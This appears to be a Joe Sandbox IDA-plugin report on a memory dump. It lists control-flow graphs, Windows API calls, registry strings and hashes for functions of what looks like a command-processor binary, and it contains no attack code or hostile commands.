7ff7cd494668-7ff7cd49466d call 7ff7cd4a9044 504->507 506->500 507->501 510->511 514 7ff7cd494596-7ff7cd4945fa CreateProcessAsUserW 510->514 513 7ff7cd49448b-7ff7cd49448f 511->513 515 7ff7cd494672-7ff7cd494682 GetLastError 513->515 516 7ff7cd494495-7ff7cd4944c7 CloseHandle call 7ff7cd49498c 513->516 514->513 518 7ff7cd49468d-7ff7cd494694 515->518 516->518 522 7ff7cd4944cd-7ff7cd4944e5 516->522 520 7ff7cd4946a2-7ff7cd4946ac 518->520 521 7ff7cd494696-7ff7cd4946a0 518->521 523 7ff7cd494705-7ff7cd494707 520->523 524 7ff7cd4946ae-7ff7cd4946b5 call 7ff7cd4997bc 520->524 521->520 521->524 525 7ff7cd4947a3-7ff7cd4947a9 522->525 526 7ff7cd4944eb-7ff7cd4944f2 522->526 523->522 530 7ff7cd49470d-7ff7cd49472a call 7ff7cd48cd90 523->530 540 7ff7cd494703 524->540 541 7ff7cd4946b7-7ff7cd494701 call 7ff7cd4dc038 524->541 527 7ff7cd4945ff-7ff7cd494607 526->527 528 7ff7cd4944f8-7ff7cd494507 526->528 527->528 531 7ff7cd49460d 527->531 532 7ff7cd494612-7ff7cd494616 528->532 533 7ff7cd49450d-7ff7cd494553 call 7ff7cd495cb4 call 7ff7cd4933f0 call 7ff7cd49498c 528->533 548 7ff7cd49472c-7ff7cd494738 _local_unwind 530->548 549 7ff7cd49473d-7ff7cd494767 call 7ff7cd4913e0 call 7ff7cd4a9eec call 7ff7cd48ff70 _local_unwind 530->549 536 7ff7cd49476c-7ff7cd494773 531->536 538 7ff7cd4947d7-7ff7cd4947df 532->538 539 7ff7cd49461c-7ff7cd494633 532->539 565 7ff7cd494558-7ff7cd49455e 533->565 536->528 546 7ff7cd494779-7ff7cd494780 536->546 543 7ff7cd4947e1-7ff7cd4947ed CloseHandle 538->543 544 7ff7cd4947f2-7ff7cd49483c call 7ff7cd48ff70 DeleteProcThreadAttributeList call 7ff7cd498f80 538->544 539->544 540->523 541->523 543->544 546->528 552 7ff7cd494786-7ff7cd494789 546->552 548->549 549->536 552->528 557 7ff7cd49478f-7ff7cd494792 552->557 557->525 561 7ff7cd494794-7ff7cd49479d call 7ff7cd4aa250 557->561 561->525 561->528 568 7ff7cd494564-7ff7cd494579 call 7ff7cd49498c 565->568 569 7ff7cd4947ae-7ff7cd4947ca call 7ff7cd4933f0 565->569 568->544 576 7ff7cd49457f-7ff7cd494584 call 7ff7cd4aa920 568->576 569->538 576->544
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                        • API String ID: 388421343-2905461000
                                        • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction ID: 955f4deb36f33b898e671ec2c20bc8e7eb73f5ef3a833e9643b8239704732ad8
                                        • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction Fuzzy Hash: EAF14E31B0CA8295EA60AF52E444BB9F7A5FB857A0F844139DF6D42754EF3CE644CB20
                                        Function 00007FF7CD495554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 579 7ff7cd495554-7ff7cd4955b9 call 7ff7cd49a640 582 7ff7cd4955bc-7ff7cd4955e8 RegOpenKeyExW 579->582 583 7ff7cd495887-7ff7cd49588e 582->583 584 7ff7cd4955ee-7ff7cd495631 RegQueryValueExW 582->584 583->582 587 7ff7cd495894-7ff7cd4958db time srand call 7ff7cd498f80 583->587 585 7ff7cd49f248-7ff7cd49f24d 584->585 586 7ff7cd495637-7ff7cd495675 RegQueryValueExW 584->586 591 7ff7cd49f260-7ff7cd49f265 585->591 592 7ff7cd49f24f-7ff7cd49f25b 585->592 588 7ff7cd495677-7ff7cd49567c 586->588 589 7ff7cd49568e-7ff7cd4956cc RegQueryValueExW 586->589 593 7ff7cd495682-7ff7cd495687 588->593 594 7ff7cd49f28b-7ff7cd49f290 588->594 595 7ff7cd4956d2-7ff7cd495710 RegQueryValueExW 589->595 596 7ff7cd49f2b6-7ff7cd49f2bb 589->596 591->586 598 7ff7cd49f26b-7ff7cd49f286 _wtol 591->598 592->586 593->589 594->589 601 7ff7cd49f296-7ff7cd49f2b1 _wtol 594->601 599 7ff7cd495712-7ff7cd495717 595->599 600 7ff7cd495729-7ff7cd495767 RegQueryValueExW 595->600 602 7ff7cd49f2ce-7ff7cd49f2d3 596->602 603 7ff7cd49f2bd-7ff7cd49f2c9 596->603 598->586 605 7ff7cd49f2f9-7ff7cd49f2fe 599->605 606 7ff7cd49571d-7ff7cd495722 599->606 607 7ff7cd49579f-7ff7cd4957dd RegQueryValueExW 600->607 608 7ff7cd495769-7ff7cd49576e 600->608 601->589 602->595 604 7ff7cd49f2d9-7ff7cd49f2f4 _wtol 602->604 603->595 604->595 605->600 609 7ff7cd49f304-7ff7cd49f31a wcstol 605->609 606->600 612 7ff7cd4957e3-7ff7cd4957e8 607->612 613 7ff7cd49f3a9 607->613 610 7ff7cd49f320-7ff7cd49f325 608->610 611 7ff7cd495774-7ff7cd49578f 608->611 609->610 614 7ff7cd49f327-7ff7cd49f33f wcstol 610->614 615 7ff7cd49f34b 610->615 616 7ff7cd495795-7ff7cd495799 611->616 617 7ff7cd49f357-7ff7cd49f35e 611->617 618 7ff7cd49f363-7ff7cd49f368 612->618 619 7ff7cd4957ee-7ff7cd495809 612->619 620 7ff7cd49f3b5-7ff7cd49f3b8 613->620 614->615 615->617 616->607 616->617 617->607 621 7ff7cd49f36a-7ff7cd49f382 wcstol 618->621 622 7ff7cd49f38e 618->622 623 7ff7cd49580f-7ff7cd495813 619->623 624 7ff7cd49f39a-7ff7cd49f39d 619->624 625 7ff7cd49582c 620->625 626 7ff7cd49f3be-7ff7cd49f3c5 620->626 621->622 622->624 623->624 627 7ff7cd495819-7ff7cd495823 623->627 624->613 629 7ff7cd495832-7ff7cd495870 RegQueryValueExW 625->629 630 7ff7cd49f3ca-7ff7cd49f3d1 625->630 626->629 627->620 628 7ff7cd495829 627->628 628->625 631 7ff7cd495876-7ff7cd495882 RegCloseKey 629->631 632 7ff7cd49f3dd-7ff7cd49f3e2 629->632 630->632 631->583 633 7ff7cd49f3e4-7ff7cd49f412 ExpandEnvironmentStringsW 632->633 634 7ff7cd49f433-7ff7cd49f439 632->634 636 7ff7cd49f414-7ff7cd49f426 call 7ff7cd4913e0 633->636 637 7ff7cd49f428 633->637 634->631 635 7ff7cd49f43f-7ff7cd49f44c call 7ff7cd48b900 634->635 635->631 640 7ff7cd49f42e 636->640 637->640 640->634
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseOpensrandtime
                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                        • API String ID: 145004033-3846321370
                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction ID: e1c7cb2d574ece889a5a590aefa0558f7204a62cca21a1311226f46b0f8dcc6a
                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction Fuzzy Hash: 6AE1913262CA82D6EB60AF51E44057AF7A5FB98760FC01135EF9E02A54EF7CD644CB20
                                        Function 00007FF7CD4937D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 821 7ff7cd4937d8-7ff7cd493887 GetCurrentThreadId OpenThread call 7ff7cd4904f4 HeapSetInformation RegOpenKeyExW 824 7ff7cd49e9f8-7ff7cd49ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7cd49388d-7ff7cd4938eb call 7ff7cd495920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7cd49ea41-7ff7cd49ea59 GetThreadLocale 824->827 825->827 831 7ff7cd4938f1-7ff7cd493913 memset 825->831 829 7ff7cd49ea74-7ff7cd49ea77 827->829 830 7ff7cd49ea5b-7ff7cd49ea67 827->830 834 7ff7cd49ea94-7ff7cd49ea96 829->834 835 7ff7cd49ea79-7ff7cd49ea7d 829->835 830->829 832 7ff7cd49eaa5 831->832 833 7ff7cd493919-7ff7cd493935 call 7ff7cd494d5c 831->833 838 7ff7cd49eaa8-7ff7cd49eab4 832->838 841 7ff7cd49eae2-7ff7cd49eaff call 7ff7cd483240 call 7ff7cd4a8530 call 7ff7cd494c1c 833->841 842 7ff7cd49393b-7ff7cd493942 833->842 834->832 835->834 837 7ff7cd49ea7f-7ff7cd49ea89 835->837 837->834 838->833 840 7ff7cd49eaba-7ff7cd49eac3 838->840 843 7ff7cd49eacb-7ff7cd49eace 840->843 850 7ff7cd49eb00-7ff7cd49eb0d 841->850 844 7ff7cd49eb27-7ff7cd49eb40 _setjmp 842->844 845 7ff7cd493948-7ff7cd493962 _setjmp 842->845 846 7ff7cd49ead0-7ff7cd49eadb 843->846 847 7ff7cd49eac5-7ff7cd49eac9 843->847 852 7ff7cd49eb46-7ff7cd49eb49 844->852 853 7ff7cd4939fe-7ff7cd493a05 call 7ff7cd494c1c 844->853 845->850 851 7ff7cd493968-7ff7cd49396d 845->851 846->838 854 7ff7cd49eadd 846->854 847->843 863 7ff7cd49eb15-7ff7cd49eb1f call 7ff7cd494c1c 850->863 856 7ff7cd49396f 851->856 857 7ff7cd4939b9-7ff7cd4939bb 851->857 859 7ff7cd49eb66-7ff7cd49eb6f call 7ff7cd4901b8 852->859 860 7ff7cd49eb4b-7ff7cd49eb65 call 7ff7cd483240 call 7ff7cd4a8530 call 7ff7cd494c1c 852->860 853->824 854->833 864 7ff7cd493972-7ff7cd49397d 856->864 867 7ff7cd49eb20 857->867 868 7ff7cd4939c1-7ff7cd4939c3 call 7ff7cd494c1c 857->868 880 7ff7cd49eb71-7ff7cd49eb82 _setmode 859->880 881 7ff7cd49eb87-7ff7cd49eb89 call 7ff7cd4986f0 859->881 860->859 863->867 873 7ff7cd49397f-7ff7cd493984 864->873 874 7ff7cd4939c9-7ff7cd4939de call 7ff7cd48df60 864->874 867->844 877 7ff7cd4939c8 868->877 873->864 883 7ff7cd493986-7ff7cd4939ae call 7ff7cd490580 GetConsoleOutputCP GetCPInfo call 7ff7cd4904f4 873->883 874->863 889 7ff7cd4939e4-7ff7cd4939e8 874->889 877->874 880->881 890 7ff7cd49eb8e-7ff7cd49ebad call 7ff7cd4958e4 call 7ff7cd48df60 881->890 898 7ff7cd4939b3 883->898 889->853 893 7ff7cd4939ea-7ff7cd4939ef call 7ff7cd48be00 889->893 902 7ff7cd49ebaf-7ff7cd49ebb3 890->902 899 7ff7cd4939f4-7ff7cd4939fc 893->899 898->857 899->873 902->853 903 7ff7cd49ebb9-7ff7cd49ec24 call 7ff7cd4958e4 GetConsoleOutputCP GetCPInfo call 7ff7cd4904f4 call 7ff7cd48be00 call 7ff7cd490580 GetConsoleOutputCP GetCPInfo call 7ff7cd4904f4 902->903 903->890
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                        • API String ID: 2624720099-1920437939
                                        • Opcode ID: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction ID: 0fe49145f9bf2d30ca7e254681b1fa9e8ecc8978aa4994e345a10d6451e7baa3
                                        • Opcode Fuzzy Hash: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction Fuzzy Hash: 3FC1B231F0CA428AF714BF62A444978FAA6FF49774F844139DF2E46691FE3CA6418720
                                        Function 00007FF7CD49823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1118 7ff7cd49823c-7ff7cd49829b FindFirstFileExW 1119 7ff7cd4982cd-7ff7cd4982df 1118->1119 1120 7ff7cd49829d-7ff7cd4982a9 GetLastError 1118->1120 1124 7ff7cd498365-7ff7cd49837b FindNextFileW 1119->1124 1125 7ff7cd4982e5-7ff7cd4982ee 1119->1125 1121 7ff7cd4982af 1120->1121 1123 7ff7cd4982b1-7ff7cd4982cb 1121->1123 1127 7ff7cd4983d0-7ff7cd4983e5 FindClose 1124->1127 1128 7ff7cd49837d-7ff7cd498380 1124->1128 1126 7ff7cd4982f1-7ff7cd4982f4 1125->1126 1129 7ff7cd4982f6-7ff7cd498300 1126->1129 1130 7ff7cd498329-7ff7cd49832b 1126->1130 1127->1126 1128->1119 1131 7ff7cd498386 1128->1131 1132 7ff7cd498332-7ff7cd498353 GetProcessHeap HeapAlloc 1129->1132 1133 7ff7cd498302-7ff7cd49830e 1129->1133 1130->1121 1134 7ff7cd49832d 1130->1134 1131->1120 1137 7ff7cd498356-7ff7cd498363 1132->1137 1135 7ff7cd498310-7ff7cd498313 1133->1135 1136 7ff7cd49838b-7ff7cd4983c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 1140 7ff7cd498315-7ff7cd498323 1135->1140 1141 7ff7cd498327 1135->1141 1138 7ff7cd4a50f8-7ff7cd4a511e GetLastError FindClose 1136->1138 1139 7ff7cd4983c8-7ff7cd4983ce 1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1130
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorFileFindFirstLast
                                        • String ID:
                                        • API String ID: 873889042-0
                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction ID: d5de5088dd78f0923a8a8dc46670348a4b58465f41d834724065a0b6555cb53e
                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction Fuzzy Hash: 28513A36B0DB4296E710AF16E444579FBA6FB99BA1F848131CF2D43350EF3CE6548620
                                        Function 00007FF7CD492978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1142 7ff7cd492978-7ff7cd4929b6 1143 7ff7cd4929b9-7ff7cd4929c1 1142->1143 1143->1143 1144 7ff7cd4929c3-7ff7cd4929c5 1143->1144 1145 7ff7cd49e441 1144->1145 1146 7ff7cd4929cb-7ff7cd4929cf 1144->1146 1147 7ff7cd4929d2-7ff7cd4929da 1146->1147 1148 7ff7cd4929dc-7ff7cd4929e1 1147->1148 1149 7ff7cd492a1e-7ff7cd492a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff7cd4929e3-7ff7cd4929eb 1148->1152 1150 7ff7cd492a44-7ff7cd492a5c FindClose 1149->1150 1151 7ff7cd49e435-7ff7cd49e439 1149->1151 1153 7ff7cd492a62-7ff7cd492a6e 1150->1153 1154 7ff7cd492ae3-7ff7cd492ae5 1150->1154 1151->1145 1152->1147 1155 7ff7cd4929ed-7ff7cd492a1c call 7ff7cd498f80 1152->1155 1156 7ff7cd492a70-7ff7cd492a78 1153->1156 1157 7ff7cd49e3f7-7ff7cd49e3ff 1154->1157 1158 7ff7cd492aeb-7ff7cd492b10 _wcsnicmp 1154->1158 1156->1156 1161 7ff7cd492a7a-7ff7cd492a8d 1156->1161 1158->1153 1162 7ff7cd492b16-7ff7cd49e3f1 _wcsicmp 1158->1162 1161->1145 1163 7ff7cd492a93-7ff7cd492a97 1161->1163 1162->1153 1162->1157 1165 7ff7cd49e404-7ff7cd49e407 1163->1165 1166 7ff7cd492a9d-7ff7cd492ade memmove call 7ff7cd4913e0 1163->1166 1167 7ff7cd49e40b-7ff7cd49e413 1165->1167 1166->1152 1167->1167 1169 7ff7cd49e415-7ff7cd49e42b memmove 1167->1169 1169->1151
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction ID: b3cf702627eb1424f6585d36a976f923506730957eb3242a0acb53d3a9686309
                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction Fuzzy Hash: 8B510A22B0D68196EA30AF16A544A7AE296FB54BB4FC45230DF7E076D1FF3CE6418710
                                        Function 00007FF7CD494D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 643 7ff7cd494d5c-7ff7cd494e4b InitializeCriticalSection call 7ff7cd4958e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7cd490580 call 7ff7cd494a14 call 7ff7cd494ad0 call 7ff7cd495554 GetCommandLineW 654 7ff7cd494e4d-7ff7cd494e54 643->654 654->654 655 7ff7cd494e56-7ff7cd494e61 654->655 656 7ff7cd4951cf-7ff7cd4951e3 call 7ff7cd483278 call 7ff7cd494c1c 655->656 657 7ff7cd494e67-7ff7cd494e7b call 7ff7cd492e44 655->657 662 7ff7cd494e81-7ff7cd494ec3 GetCommandLineW call 7ff7cd4913e0 call 7ff7cd48ca40 657->662 663 7ff7cd4951ba-7ff7cd4951ce call 7ff7cd483278 call 7ff7cd494c1c 657->663 662->663 674 7ff7cd494ec9-7ff7cd494ee8 call 7ff7cd49417c call 7ff7cd492394 662->674 663->656 678 7ff7cd494eed-7ff7cd494ef5 674->678 678->678 679 7ff7cd494ef7-7ff7cd494f1f call 7ff7cd48aa54 678->679 682 7ff7cd494f21-7ff7cd494f30 679->682 683 7ff7cd494f95-7ff7cd494fee GetConsoleOutputCP GetCPInfo call 7ff7cd4951ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff7cd494f32-7ff7cd494f39 682->684 689 7ff7cd494ff0-7ff7cd495006 GetConsoleTitleW 683->689 690 7ff7cd495012-7ff7cd495018 683->690 684->683 686 7ff7cd494f3b-7ff7cd494f77 call 7ff7cd483278 GetWindowsDirectoryW 684->686 695 7ff7cd4951b1-7ff7cd4951b9 call 7ff7cd494c1c 686->695 696 7ff7cd494f7d-7ff7cd494f90 call 7ff7cd493c24 686->696 689->690 692 7ff7cd495008-7ff7cd49500f 689->692 693 7ff7cd49507a-7ff7cd49507e 690->693 694 7ff7cd49501a-7ff7cd495024 call 7ff7cd493578 690->694 692->690 697 7ff7cd495080-7ff7cd4950b3 call 7ff7cd4ab89c call 7ff7cd48586c call 7ff7cd483240 call 7ff7cd493448 693->697 698 7ff7cd4950eb-7ff7cd495161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 706 7ff7cd495026-7ff7cd495030 694->706 695->663 696->683 724 7ff7cd4950d2-7ff7cd4950d7 call 7ff7cd483278 697->724 725 7ff7cd4950b5-7ff7cd4950d0 call 7ff7cd493448 * 2 697->725 703 7ff7cd49516f 698->703 704 7ff7cd495163-7ff7cd495167 698->704 710 7ff7cd495172-7ff7cd4951af free call 7ff7cd498f80 703->710 704->703 709 7ff7cd495169-7ff7cd49516d 704->709 711 7ff7cd495032-7ff7cd495059 GetStdHandle GetConsoleScreenBufferInfo 706->711 712 7ff7cd495075 call 7ff7cd4acff0 706->712 709->703 709->710 715 7ff7cd495069-7ff7cd495073 711->715 716 7ff7cd49505b-7ff7cd495067 711->716 712->693 715->693 715->712 716->693 729 7ff7cd4950dc-7ff7cd4950e6 GlobalFree 724->729 725->729 729->698
                                        APIs
                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494D9A
                                          • Part of subcall function 00007FF7CD4958E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7CD4AC6DB), ref: 00007FF7CD4958EF
                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DBB
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DCA
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DE0
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DEE
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E04
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490589
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD49059E
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905AF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD4905C5
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905EF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD490605
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490632
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD490647
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                          • Part of subcall function 00007FF7CD494AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                          • Part of subcall function 00007FF7CD494AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD495554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7CD494E35), ref: 00007FF7CD4955DA
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495623
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495667
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD4956BE
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495702
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E35
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E81
